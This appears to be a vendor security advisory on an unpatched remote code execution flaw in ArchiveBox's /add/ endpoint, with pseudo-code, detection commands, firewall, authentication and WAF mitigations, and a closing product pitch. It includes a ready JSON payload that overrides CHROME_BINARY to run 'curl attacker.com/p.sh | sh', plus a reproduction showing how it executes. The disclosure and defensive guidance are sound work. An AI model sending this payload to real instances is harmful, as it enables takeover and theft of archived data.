ArchiveBox CVE-2026-42601: RCE via /add/ — No Patch Available (CVSS 9.8)

ArchiveBox is a popular open-source web archiving tool used by indie hackers, archivists, and research teams: it saves web pages locally along with their assets, screenshots, PDFs, WARC files, and more. CVE-2026-42601 (CVSS 9.8) describes a critical vulnerability in its /add/ endpoint: a user-supplied JSON config field is merged into the crawl configuration without validation, then exported as environment variables to archive plugins. The result is arbitrary argument injection and remote code execution.

The painful detail: no official patch is available to date. All versions ≤ 0.8.6rc0 are vulnerable, and the only viable mitigation is to isolate or pull the service until a fix lands.

Technical Details

Vulnerable component

ArchiveBox exposes a web UI to add new URLs for archiving. The /add/ endpoint (the AddView in core/views.py) accepts a JSON config field originally intended to let an admin customize crawl behavior per URL (timeout, user-agent, etc.).

The problem: this JSON is merged directly into the crawl configuration without sanitization. Then, when archive plugins run (wget, youtube-dl, chrome --headless, singlefile, etc.), the resulting config is exported as environment variables to each plugin's child process.

Exploitation path

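# Reconstructed pseudo-code: vulnerable pattern (illustrative, not verbatim ArchiveBox source)
import json
import subprocess

def AddView(request):
    url = request.POST.get("url")
    user_config = json.loads(request.POST.get("config", "{}"))  # attacker-controlled JSON

    crawl_config = {**DEFAULT_CONFIG, **user_config}  # ⚠️ unvalidated merge: user keys override defaults

    for plugin in plugins:
        # ⚠️ every key becomes an env var, including CHROME_BINARY / CHROME_ARGS
        env = {k.upper(): str(v) for k, v in crawl_config.items()}
        # each plugin script picks its binary and extra arguments from these env vars
        subprocess.run([plugin.command, url], env=env)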
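For contrast, here is a minimal sketch of what validating the field before the merge could look like. It assumes a hypothetical allowlist (ALLOWED_USER_KEYS) covering the per-URL settings the feature was meant for (timeout, user-agent). This is not the upstream fix, which does not exist yet.

```python
# Hypothetical allowlist: the only per-crawl keys a user may override, with expected types
ALLOWED_USER_KEYS = {"TIMEOUT": int, "USER_AGENT": str}


def merge_user_config(defaults: dict, user_config: dict) -> dict:
    """Merge user overrides into defaults, rejecting any key not on the allowlist."""
    if not isinstance(user_config, dict):
        raise ValueError("config must be a JSON object")
    merged = dict(defaults)  # copy so the shared defaults are never mutated
    for key, value in user_config.items():
        name = str(key).upper()  # normalize the same way the env export does
        expected = ALLOWED_USER_KEYS.get(name)
        if expected is None:
            raise ValueError(f"config key not allowed: {key!r}")
        # bool is a subclass of int, so reject it explicitly
        if isinstance(value, bool) or not isinstance(value, expected):
            raise ValueError(f"wrong type for {name}: {type(value).__name__}")
        merged[name] = value
    return merged
```

Raising an error, rather than silently dropping unknown keys, makes tampering attempts visible in application logs.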

An attacker submits a POST to /add/ with a config field like this (shown as JSON for readability):

{
  "url": "https://example.com",
  "config": {
    "CHROME_BINARY": "/usr/bin/bash",
    "CHROME_ARGS": "-c 'curl attacker.com/p.sh | sh'"
  }
}

The Chrome plugin receives these env vars and, instead of launching the browser, runs bash with the payload.
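The following stdlib-only reproduction shows why this payload turns into bash. It copies the merge and env export from the pseudo-code and adds a hypothetical Chrome plugin that takes its binary and extra flags from CHROME_BINARY and CHROME_ARGS. The DEFAULT_CONFIG values and the chrome_argv helper are assumptions for illustration, not ArchiveBox code. The sketch only builds the argument list and never executes it.

```python
import shlex

# Hypothetical defaults standing in for DEFAULT_CONFIG in the pseudo-code
DEFAULT_CONFIG = {"CHROME_BINARY": "chromium", "CHROME_ARGS": "--headless", "TIMEOUT": 60}


def build_env(user_config: dict) -> dict:
    """Reproduce the vulnerable merge + env export from the pseudo-code."""
    crawl_config = {**DEFAULT_CONFIG, **user_config}  # later keys win: user overrides defaults
    return {k.upper(): str(v) for k, v in crawl_config.items()}


def chrome_argv(env: dict, url: str) -> list:
    """Hypothetical plugin logic: binary and extra args are read straight from the environment."""
    return [env["CHROME_BINARY"], *shlex.split(env["CHROME_ARGS"]), url]


payload = {"CHROME_BINARY": "/usr/bin/bash", "CHROME_ARGS": "-c 'curl attacker.com/p.sh | sh'"}
argv = chrome_argv(build_env(payload), "https://example.com")
print(argv)
# ['/usr/bin/bash', '-c', 'curl attacker.com/p.sh | sh', 'https://example.com']
```

With `bash -c`, the first argument after the command string becomes `$0`. The appended URL is therefore swallowed, and the payload runs unchanged.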

Characteristics

Field	Value
CVSS 3.1	9.8 (CRITICAL)
Vector	`AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`
CWE	CWE-78 (OS Command Injection) + CWE-454 (External Initialization of Trusted Variables)
Authentication	None by default on public deployments
Fix status	❌ No official patch available
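The 9.8 score follows directly from the vector. This sketch of the CVSS v3.1 base-score formula reproduces it, using the metric weights and the Roundup function from the FIRST specification:

```python
import math

# CVSS v3.1 base metric weights (FIRST CVSS v3.1 specification)
AV = {"N": 0.85, "A": 0.62, "L": 0.55, "P": 0.2}
AC = {"L": 0.77, "H": 0.44}
PR_UNCHANGED = {"N": 0.85, "L": 0.62, "H": 0.27}
PR_CHANGED = {"N": 0.85, "L": 0.68, "H": 0.5}
UI = {"N": 0.85, "R": 0.62}
CIA = {"H": 0.56, "L": 0.22, "N": 0.0}


def roundup(x: float) -> float:
    """Spec Roundup: smallest one-decimal value >= x, robust to float noise."""
    i = round(x * 100000)
    if i % 10000 == 0:
        return i / 100000.0
    return (math.floor(i / 10000) + 1) / 10.0


def base_score(vector: str) -> float:
    """Compute the CVSS v3.1 base score from a vector like 'AV:N/AC:L/...'."""
    m = dict(part.split(":") for part in vector.split("/"))  # a 'CVSS:3.1' prefix is tolerated
    changed = m["S"] == "C"
    iss = 1 - (1 - CIA[m["C"]]) * (1 - CIA[m["I"]]) * (1 - CIA[m["A"]])
    if changed:
        impact = 7.52 * (iss - 0.029) - 3.25 * (iss - 0.02) ** 15
    else:
        impact = 6.42 * iss
    pr = (PR_CHANGED if changed else PR_UNCHANGED)[m["PR"]]
    exploitability = 8.22 * AV[m["AV"]] * AC[m["AC"]] * pr * UI[m["UI"]]
    if impact <= 0:
        return 0.0
    total = 1.08 * (impact + exploitability) if changed else impact + exploitability
    return roundup(min(total, 10))


print(base_score("AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"))  # 9.8
```

Here Impact = 6.42 × 0.914816 ≈ 5.873 and Exploitability ≈ 3.887, so the sum is ≈ 9.760, which rounds up to 9.8.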

Affected Products and Versions

Product	Affected versions	Patched version
ArchiveBox	≤ 0.8.6rc0 (all current versions)	❌ None

Check your version:

# Docker
docker exec archivebox archivebox version

# Pip
pip show archivebox | grep Version
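If you manage several hosts, a small script can flag affected installs. This sketch reads the installed version with importlib.metadata and compares it to 0.8.6rc0. The comparison uses a simplified, hypothetical parser that only understands X.Y[.Z] with an optional a/b/rc suffix. For full PEP 440 handling, use the packaging library instead.

```python
import re
from importlib import metadata

LAST_AFFECTED = "0.8.6rc0"  # upper bound of the affected range in the table above

# Simplified matcher: X.Y[.Z] plus an optional a/b/rc pre-release (not full PEP 440)
_VERSION_RE = re.compile(r"^(\d+)\.(\d+)(?:\.(\d+))?(?:(a|b|rc)(\d+))?")
_PHASE_RANK = {"a": 0, "b": 1, "rc": 2, None: 3}  # a final release sorts after its pre-releases


def version_key(version: str) -> tuple:
    """Turn '0.8.6rc0' into a tuple that compares in release order."""
    match = _VERSION_RE.match(version.strip())
    if match is None:
        raise ValueError(f"unsupported version string: {version!r}")
    major, minor, patch, phase, num = match.groups()
    return (int(major), int(minor), int(patch or 0), _PHASE_RANK[phase], int(num or 0))


def is_affected(version: str) -> bool:
    return version_key(version) <= version_key(LAST_AFFECTED)


if __name__ == "__main__":
    try:
        installed = metadata.version("archivebox")
    except metadata.PackageNotFoundError:
        print("archivebox is not installed in this Python environment")
    else:
        verdict = "AFFECTED" if is_affected(installed) else "outside the affected range above"
        print(f"archivebox {installed}: {verdict}")
```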

Exploitation and Impact

Real exposure surface

Many ArchiveBox instances are publicly exposed without authentication:

Personal hosting by amateur archivists
University libraries running ArchiveBox as a private Wayback Machine
Community platforms (web memory, citizen journalism)

A Shodan/Censys scan regularly shows thousands of reachable instances. Any of them that accept anonymous submissions to /add/ are immediately exploitable.

Post-exploitation impact

RCE inside the ArchiveBox container/host: filesystem access, stored archives access
Theft of archived data: for journalistic or research content, this can include sensitive sources, documented leaks
LAN pivot: ArchiveBox often runs on a homelab or shared VPS
Botnet recruitment / cryptomining: hosts sized for crawling workloads usually have CPU to spare

Public exploit

No detailed public PoC exists yet, but the exploit is trivial to reproduce from the public description. Expect automated scanners to start probing for it within 24-48h.

Detection and IOCs

ArchiveBox logs

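# Hunt /add/ calls with non-standard config bodies.
# Standard access logs do not record POST bodies: this only works if your reverse proxy
# logs request bodies (the log path is an example; adjust it to your setup).
# -i because keys are upper-cased server-side, so lowercase keys work too.
grep -E "POST /add" /var/log/archivebox/access.log | \
  grep -iE "config.*(CHROME|BINARY|PATH)"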
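Because the vulnerable code upper-cases keys, a case-sensitive match misses lowercase variants such as chrome_binary. If you capture /add/ request bodies (for example, via reverse-proxy body logging), this sketch parses the form body, decodes the config field, and flags suspicious keys case-insensitively. It assumes a form-encoded body with a field named config, as in the pseudo-code. suspicious_config_keys is a hypothetical helper.

```python
import json
import re
from urllib.parse import parse_qs

# Key patterns taken from the article's grep and WAF rules, matched case-insensitively:
# the vulnerable code upper-cases keys, so "chrome_binary" is as dangerous as "CHROME_BINARY".
SUSPICIOUS_KEY = re.compile(r"BINARY|COMMAND|ARGS|PATH", re.IGNORECASE)


def suspicious_config_keys(form_body: str) -> list:
    """Return config keys in a form-encoded /add/ body that look like binary/arg overrides."""
    hits = []
    for raw in parse_qs(form_body).get("config", []):
        try:
            config = json.loads(raw)
        except json.JSONDecodeError:
            hits.append("<unparseable config>")  # malformed JSON is itself worth a look
            continue
        if isinstance(config, dict):
            hits.extend(str(k) for k in config if SUSPICIOUS_KEY.search(str(k)))
    return hits
```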

System logs

# Processes owned by (or named after) archivebox that are not expected archivers
# ("[a]rchivebox" keeps grep from matching its own command line)
ps -ef | grep -i "[a]rchivebox" | grep -vE "wget|chrome|python|node"

# Suspicious env vars injected into child processes
# (inspect via /proc; run as root; covers direct children only)
for pid in $(pgrep -P "$(pgrep -d, -f archivebox)"); do
  cat /proc/$pid/environ 2>/dev/null | tr '\0' '\n' | grep -iE "binary|command|args"
done

Indicators of compromise

Unexpected outbound connections from the ArchiveBox container/host
Binary files appearing in /tmp, /var/tmp, /dev/shm
Crontab or systemd service modifications
Abnormal network traffic to non-archived destinations

Mitigation — Without an Official Patch

Option 1 — Immediate network isolation

If your ArchiveBox is internet-exposed:

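# Allow the LAN first: ufw applies the first matching rule, so the deny must come after
sudo ufw allow from 192.168.1.0/24 to any port 8000 proto tcp
sudo ufw deny in 8000/tcp

# Caution: ports published by Docker bypass ufw (Docker writes its own iptables rules),
# so for Docker, bind the port to 127.0.0.1 in docker-compose.yml instead:
services:
  archivebox:
    ports:
      - "127.0.0.1:8000:8000"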

Then reload:

docker compose up -d
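Firewall changes are easy to get wrong (Docker-published ports, for instance, skip ufw), so verify them from a host outside your LAN. The following is a minimal TCP reachability check. port_is_reachable is a hypothetical helper, and 8000 is the port used in this section.

```python
import socket


def port_is_reachable(host: str, port: int, timeout: float = 3.0) -> bool:
    """True if a TCP connection to host:port succeeds within the timeout."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:  # refused, timed out, unreachable, DNS failure
        return False
```

Run it from outside your network: `port_is_reachable("203.0.113.10", 8000)` should return False once isolation is in place. Here 203.0.113.10 is a documentation placeholder for your public IP.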

Option 2 — Force authentication

ArchiveBox can restrict its web UI to logged-in users. Make sure anonymous access is disabled:

# ArchiveBox config
archivebox config --set PUBLIC_INDEX=False
archivebox config --set PUBLIC_ADD_VIEW=False
archivebox config --set PUBLIC_SNAPSHOTS=False

Then create an admin account if not done:

archivebox manage createsuperuser

⚠️ This is a partial mitigation: an attacker who guesses or phishes an admin account can still exploit.
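To confirm the settings took effect, check what an anonymous client gets from /add/. This sketch sends a single unauthenticated GET without following redirects and submits nothing. It assumes that a locked-down instance answers with a redirect to the login page (or 401/403), while 200 means the add form is served to anyone. anonymous_add_status is a hypothetical helper.

```python
import urllib.error
import urllib.request


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    # Returning None makes urllib raise HTTPError for 3xx instead of following it
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def anonymous_add_status(base_url: str, timeout: float = 5.0) -> int:
    """HTTP status an anonymous GET <base_url>/add/ receives (redirects not followed)."""
    # ProxyHandler({}) connects directly, ignoring any *_proxy environment variables
    opener = urllib.request.build_opener(urllib.request.ProxyHandler({}), _NoRedirect)
    try:
        with opener.open(base_url.rstrip("/") + "/add/", timeout=timeout) as resp:
            return resp.status
    except urllib.error.HTTPError as err:  # 3xx/4xx/5xx land here
        return err.code
```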

Option 3 — Reverse proxy with WAF

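If you must keep public exposure (not recommended), put Nginx + ModSecurity in front and reject /add/ submissions whose config field looks like a binary or argument override. Treat this as a stopgap, because a denylist can be bypassed.

# Requires ModSecurity v3 and the ModSecurity-nginx connector.
# nginx's own `if ($request_body ~ ...)` cannot do this: `if` runs before the body is read, so $request_body is empty.
modsecurity on;
modsecurity_rules '
    SecRequestBodyAccess On
    SecRule REQUEST_FILENAME "@beginsWith /add/" "id:1000101,phase:2,deny,status:403,log,chain"
        SecRule ARGS_POST:config "@rx (?i)(_BINARY|_COMMAND|_ARGS|PATH|/bin/|/usr/bin/)"
';

location /add/ {
    proxy_pass http://archivebox:8000;
}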

Option 4 — Pull the service

For production instances holding sensitive data: shut down the service until the ArchiveBox team ships an official patch. It's painful but the only option that fully eliminates the risk.

docker compose stop archivebox

Proactive watch

Subscribe to the ArchiveBox GitHub repo to be notified the moment a patch lands:

https://github.com/ArchiveBox/ArchiveBox/releases

Why Continuous Monitoring of Self-Hosted Stacks Matters

Self-hosted tools (ArchiveBox, Vaultwarden, Bitwarden CE, Jellyfin, Nextcloud, Gitea…) are massively deployed in homelabs and SMBs, often without security visibility. A CVE like CVE-2026-42601 — no patch, no wide announcement, no CISA KEV — can go unnoticed for weeks while being trivially exploitable.

With cveo.tech, you can inventory your self-hosted services alongside your core systems and get automatic alerts the moment a critical CVE targets one of the exact versions you run, even when the upstream maintainer stays quiet.